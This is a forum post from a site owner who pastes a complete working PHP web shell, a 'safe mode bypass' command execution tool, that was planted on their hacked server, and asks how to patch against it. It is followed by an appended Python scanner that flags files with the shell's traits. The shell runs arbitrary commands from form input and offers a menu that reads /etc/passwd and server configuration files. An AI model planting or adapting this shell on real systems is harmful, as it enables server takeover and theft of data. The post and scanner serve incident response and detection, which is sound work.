I got hacked and the following code was placed within my files:
Code:
<?
/*
Kodlama By Liz0ziM
Safe Mode Command Execution Shell
*/
function safeshell($komut)
{
ini_restore("safe_mode");
ini_restore("open_basedir");
$res = '';
if (!empty($komut))
{
if(function_exists('exec'))
{
@exec($komut,$res);
$res = join("n",$res);
}
elseif(function_exists('shell_exec'))
{
$res = @shell_exec($komut);
}
elseif(function_exists('system'))
{
@ob_start();
@system($komut);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru'))
{
@ob_start();
@passthru($komut);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($komut,"r")))
{
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}
}
return $res;
}
echo "<b><font color=blue>Liz0ziM Private Safe Mode Command Execution Bypass Exploit</font></b>
";
print_r('
<pre>
<form method="POST" action="">
<b><font color=blue>Komut :</font></b><input name="baba" type="text"><input value="?al??t?r" type="submit">
</form>
<form method="POST" action="">
<b><font color=blue>H?zl? Men? :=) :</font><select size="1" name="liz0">
<option value="cat /etc/passwd">/etc/passwd</option>
<option value="netstat -an | grep -i listen">T?m A??k Portalar? G?r</option>
<option value="cat /var/cpanel/accounting.log">/var/cpanel/accounting.log</option>
<option value="cat /etc/syslog.conf">/etc/syslog.conf</option>
<option value="cat /etc/hosts">/etc/hosts</option>
<option value="cat /etc/named.conf">/etc/named.conf</option>
<option value="cat /etc/httpd/conf/httpd.conf">/etc/httpd/conf/httpd.conf</option>
</select> <input type="submit" value="G?ster Bakim">
</form>
</pre>
');
ini_restore("safe_mode");
ini_restore("open_basedir");
if($_POST[baba]!= "") { $liz0=safeshell($_POST[baba]); }
if($_POST[liz0]!= "") { $liz0zim=safeshell($_POST[liz0]); }
$uid=safeshell('id');
$server=safeshell('uname -a');
echo "<pre><h4>";
echo "<b><font color=red>Kimim Ben :=)</font></b>:$uid
";
echo "<b><font color=red>Server</font></b>:$server
";
echo "<b><font color=red>Komut Sonu?lar?:</font></b>
";
if($_POST["baba"]!= "") { echo $liz0; }
if($_POST["liz0"]!= "") { echo $liz0zim; }
echo "</h4></pre>";
?>
How would I patch this? Like, is there any code I can add to a global file to prevent this "safemode bypass"?
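A starting point for finding other copies of this file on the same host, as an added example that is not part of the original post: a Python scanner that scores PHP files on the three traits visible in the sample above (`ini_restore` on `safe_mode`/`open_basedir`, a fallback chain of command-execution functions, and request input in the same file). The function names, file extensions and score threshold are assumptions of this example.

```python
import re
import sys
from pathlib import Path

# Traits read off the sample in the post; the scoring thresholds are assumptions.
EXEC_FUNCS = ("exec", "shell_exec", "system", "passthru", "popen")
RESTORE_RE = re.compile(r"ini_restore\s*\(\s*['\"](safe_mode|open_basedir)['\"]", re.I)
REQUEST_RE = re.compile(r"\$_(POST|GET|REQUEST|COOKIE)\s*\[", re.I)

# Constructed inputs: a non-working string with the sample's traits, and a benign file.
SHELL_LIKE = '''<? ini_restore("safe_mode"); ini_restore("open_basedir");
if(function_exists('exec')){@exec($k,$r);} elseif(function_exists('shell_exec')){$r=@shell_exec($k);}
elseif(function_exists('system')){@system($k);} if($_POST[baba]!=""){ } ?>'''
BENIGN = '<?php $ch = curl_init(); $out = curl_exec($ch); echo htmlspecialchars($_GET["q"]); ?>'


def exec_funcs_called(src):
    """Return which command-execution functions are called (not just named) in src."""
    # The lookbehind skips curl_exec(, $obj->exec( and counts shell_exec( only once.
    return {f for f in EXEC_FUNCS if re.search(r"(?<![\w>$])" + f + r"\s*\(", src, re.I)}


def score_php(src):
    """Return (score, reasons); one point per trait of the posted shell found in src."""
    reasons = []
    restored = sorted({m.lower() for m in RESTORE_RE.findall(src)})
    if restored:
        reasons.append("ini_restore on " + ", ".join(restored))
    funcs = exec_funcs_called(src)
    if len(funcs) >= 3:
        reasons.append("execution fallback chain: " + ", ".join(sorted(funcs)))
    if funcs and REQUEST_RE.search(src):
        reasons.append("request input in a file that runs commands")
    return len(reasons), reasons


def scan_tree(root, min_score=2):
    """Yield (path, reasons) for PHP-like files under root scoring at least min_score."""
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in {".php", ".phtml", ".inc"}:
            score, reasons = score_php(path.read_text(errors="replace"))
            if score >= min_score:
                yield str(path), reasons


if __name__ == "__main__":
    for hit, why in scan_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(hit, "|", "; ".join(why))
```

Run it with the web root as the only argument. A hit is a lead for manual review, and a variant that obfuscates these function names will not match.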